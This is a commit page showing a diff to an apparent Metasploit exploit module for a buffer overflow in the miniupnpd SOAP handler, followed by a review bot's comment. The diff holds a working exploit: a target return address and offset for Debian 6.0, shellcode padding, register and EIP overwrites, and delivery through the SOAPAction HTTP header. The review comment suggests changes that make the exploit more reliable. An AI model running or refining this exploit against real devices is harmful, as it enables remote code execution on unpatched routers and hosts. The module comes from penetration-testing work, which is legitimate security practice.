
Commit 8ced348

committed
Deleted some unneeded comments and used the rand_text function rather than static values.
1 parent df20e79 commit 8ced348


1 file changed

+5
-10
lines changed


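--- a/modules/exploits/multi/upnp/miniupnpd_soap_bof.rb
+++ b/modules/exploits/multi/upnp/miniupnpd_soap_bof.rb
@@ -9,6 +9,7 @@
 
 class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::HttpClient
+Rank = NormalRanking
 
 def initialize(info = {})
 super(update_info(info,
@@ -20,7 +21,6 @@ def initialize(info = {})
 },
 'Author' => [ 'Dejan Lukan' ],
 'License' => MSF_LICENSE,
-'Version' => '$Revision: 9999 $',
 'DefaultOptions' => { 'EXITFUNC' => 'process', },
 # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
 # input, which is why it can't be part of the shellcode (otherwise the vulnerable part
@@ -33,7 +33,6 @@ def initialize(info = {})
 ],
 'Targets' =>
 [
-#['Debian GNU/Linux 4.0', { 'Ret' => 0x0804c334, 'Offset' => 2123 }],
 ['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
 ],
 'DefaultTarget' => 0,
@@ -61,14 +60,13 @@ def exploit
 sploit += payload.encoded
 
 # nops
-#sploit += "\x90"*(target['Offset'] - sploit.length - 16)
 sploit += rand_text(target['Offset'] - sploit.length - 16)
 
 # overwrite registers on stack: the values are not used, so we can overwrite them with anything
-sploit += "\x41\x41\x41\x41" # overwrite EBX
-sploit += "\x42\x42\x42\x42" # overwrite ESI
-sploit += "\x43\x43\x43\x43" # overwrite EDI
-sploit += "\x44\x44\x44\x44" # overwrite EBP
+sploit += rand_text(4) # overwrite EBX
+sploit += rand_text(4) # overwrite ESI
+sploit += rand_text(4) # overwrite EDI
+sploit += rand_text(4) # overwrite EBP
 
 # Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
 # stack points directly to the string after 'Soapaction: ', which is why we must
@@ -104,9 +102,6 @@ def exploit
 'uri' => target_uri.path,
 'headers' => {
 'SOAPAction' => sploit,
-#'User-Agent' => 'Python-urllib/2.7',
-#'Connection' => 'close',
-#'Content-Type' => 'application/x-www-form-urlencoded',
 },
 'data' => data,
 })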
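Review bot: The four `rand_text(4)` register fillers and the `rand_text(target['Offset'] - ...)` padding in the `def exploit` hunk end up as the value of the `SOAPAction` HTTP header (see the last hunk), so any byte that cannot legally sit in a header value — `\r`, `\n`, `\x00` — and the `"` (`\x22`) that the initialize-hunk comment says miniupnpd scans for must never be emitted there. As far as I can tell `rand_text` draws from the full byte range minus the module's payload `BadChars`, and that `BadChars` list is not in this diff, so I cannot confirm it covers those bytes; the replaced `\x90`/`\x41..\x44` constants were header-safe unconditionally, so this is a behaviour change the commit message does not mention. The low-risk fix is the alphanumeric generator, e.g. `sploit += rand_text_alpha(4) # overwrite EBX` for each register line and `sploit += rand_text_alpha(target['Offset'] - sploit.length - 16)` for the padding, or alternatively verify that `BadChars` contains at least `\x00\x0a\x0d\x22`. Also worth a one-line comment above the padding that execution is not expected to slide through it (per the "pop ebp, ret" comment, the payload is reached directly), since the old `# nops` label no longer describes random bytes. `exploit` begins before and continues past this hunk.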
